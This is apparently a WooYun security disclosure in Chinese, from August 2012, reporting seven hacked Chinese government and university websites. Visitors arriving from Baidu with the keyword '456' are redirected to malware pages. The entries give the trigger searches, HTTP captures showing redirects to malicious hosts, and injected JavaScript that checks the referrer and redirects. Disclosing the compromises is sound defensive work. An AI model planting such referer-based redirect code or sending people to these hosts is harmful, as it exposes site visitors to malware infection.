WooYun.org

1，广东茂名市气象局官方网站被入侵挂马,地址:www.mmqx.gov.cn
当带有特定关键字的REFER访问时，将被302跳转到一个挂马网页：
http://www.hynu.edu.cn/site/baidu.html?www.mmqx.gov.cn
(hynu.edu.cn 是衡阳师范学院的网站，也已经被入侵挂马）
可能茂名气象局的网站服务器被入侵

百度搜索"456 mmqx.gov.cn“第一个结果即是，目前仍未修复
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=456+mmqx.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=4672
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: www.mmqx.gov.cn
Connection: Keep-Alive
HTTP/1.1 302 Object moved
Date: Fri, 24 Aug 2012 01:04:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.hynu.edu.cn/site/baidu.html?www.mmqx.gov.cn
Content-Length: 175
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.hynu.edu.cn/site/baidu.html?www.mmqx.gov.cn">here</a>.</body>
2，汉中市南郑县人民政府官网www.nanzheng.gov.cn被入侵挂马
当通过百度或其他搜索引擎REFER访问并带有特别关键字时，被301跳转到http://dfffg.3322.org:7
接着跳转到木马网站
可能服务器被入侵挂马

在百度搜索"456 nanzheng"，第一个结果，点击即可发现，目前仍被挂马中
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=456+nanzheng&rsv_bp=0&rsv_spt=3&inputT=2922
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: www.nanzheng.gov.cn
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Aug 2012 11:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://dfffg.3322.org:7
Content-Length: 0
Content-Type: text/html
3，巴彦淖尔政府网站文联分站被入侵，地址为：http://wl.bynr.gov.cn
网站首页的代码判断REFER，如果来自指定关键字，则跳转到：
ttp://a.fjtj.org:82/456s.asp
可能网页被篡改或服务器被入侵

如图，搜索"wl.bynr 456" ,第一个结果即是
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=wl.bynr+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3531
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: wl.bynr.gov.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Aug 2012 11:34:47 GMT
Server: Microsoft-IIS/6.0
Content-Length: 13855
Content-Type: text/html
Cache-control: private
.....
<script type="text/javascript">
<!--
var arrx=["http://a.fjtj.org:82/456s.asp"];
var key="456";
var refurl=document.referrer;
var iskey=false;
if(decode_gb2312(refurl).indexOf(key)>-1)
{
setTimeout("location.href="+"\""+arrx[parseInt(Math.random()*arrx.length)]+"\"",0);
}

var xx=new GB2312UTF8();
.......
4，鄂尔多斯市公安局交通管理支队官方网站被入侵,地址:www.ordosgajj.gov.cn
通过特定的REFER关键字访问的请求将被导引到一个被篡改的页面
页面上有木马程序
可能服务器被入侵或网页被篡改

如图，百度搜索"456 ordosgajj.gov.cn"，第一个结果点击即是，目前仍是如此
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=456+ordosgajj.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3656
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: www.ordosgajj.gov.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 29938
Content-Type: text/html
Content-Location: http://www.ordosgajj.gov.cn/index.htm
Last-Modified: Fri, 10 Aug 2012 06:41:25 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 23 Aug 2012 11:40:52 GMT
.....
<script type="text/javascript">
var key="456";
var refurl=document.referrer;
var iskey=false;
if(decode_gb2312(refurl).indexOf(key)>-1)
{
iskey=true;
}

var xx=new GB2312UTF8();
if(xx.Utf8ToGb2312(refurl).indexOf(key)>-1)
{
iskey=true;
}
if(iskey!=true)
{
var strUrl=window.location.href;
var arrUrl=strUrl.split("/");
var strPage=arrUrl[arrUrl.length-1];
if(strPage=="default.html")
{

}
else
{
window.location="/index.aspx";
}
}
......
5，迪庆藏族自治州人民政府官方网站:www.diqing.gov.cn 被入侵挂马
通过特定关键字REFER访问网站，将被302跳转到
http://tv456-002.6600.org:92/
接着跳转到挂马网站 可能服务器被入侵

百度搜索“diqing.gov.cn 456“ ，第一个结果即是，目前仍未修复
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=diqing.gov.cn+456&rsv_bp=0&rsv_spt=3&inputT=2359
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: www.diqing.gov.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Thu, 23 Aug 2012 11:46:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://tv456-002.6600.org:92/
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 146
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://tv456-002.6600.org:92/">here</a>.</h2>
</body></html>
6，南京工业大学分站 gra.njut.edu.cn 被入侵挂马
通过特定关键字REFER访问的请求，将被301跳转引导到一个挂马网页：
http://www.shzq.edu.cn/extensions/ExtBank/360/index.htm
（shzq.edu.cn是上海中侨职业技术学院的网站，此网站也被入侵挂马）
可能南京工业大学分站服务器被入侵

百度搜索“gra.njut.edu.cn 456”，第一个结果即是
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=gra.njut.edu.cn+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=375
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: gra.njut.edu.cn
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Aug 2012 11:54:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.shzq.edu.cn/extensions/ExtBank/360/index.htm
Content-Length: 0
Content-Type: text/html
Cache-control: private
7，中国广西东兴市人民政府网站被入侵,地址:http://www.dxzf.gov.cn
当通过特定的关键字REFER访问此网站时，将被导引到一个木马网站：
www.ff456.info
可能服务器被入侵或网页被篡改

百度搜索“456 dxzf.gov.cn” ，第一个结果即是，目前仍未修复
抓包结果：
GET / HTTP/1.1
Accept: */*
Referer: http://www.baidu.com/s?wd=456+dxzf.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=1703
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Host: www.dxzf.gov.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 13995
Content-Type: text/html
Content-Location: http://www.dxzf.gov.cn/index.htm
Last-Modified: Wed, 22 Aug 2012 04:26:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 23 Aug 2012 11:59:57 GMT
....
<script type="text/javascript">
<!--
var arrx=["http://www.ff456.info"];
var key="456";
var refurl=document.referrer;
var iskey=false;
if(decode_gb2312(refurl).indexOf(key)>-1)
{
setTimeout("location.href="+"\""+arrx[parseInt(Math.random()*arrx.length)]+"\"",0);
}

var xx=new GB2312UTF8();
if(xx.Utf8ToGb2312(refurl).indexOf(key)>-1)
{
setTimeout("location.href="+"\""+arrx[parseInt(Math.random()*arrx.length)]+"\"",0);
}
if(iskey!=true)
{
var strUrl=window.location.href;
var arrUrl=strUrl.split("/");
var strPage=arrUrl[arrUrl.length-1];
if(strPage=="index.htm")
{
window.location="index.asp";
}
else
{
window.location="index.asp";
}
}

-->
</script>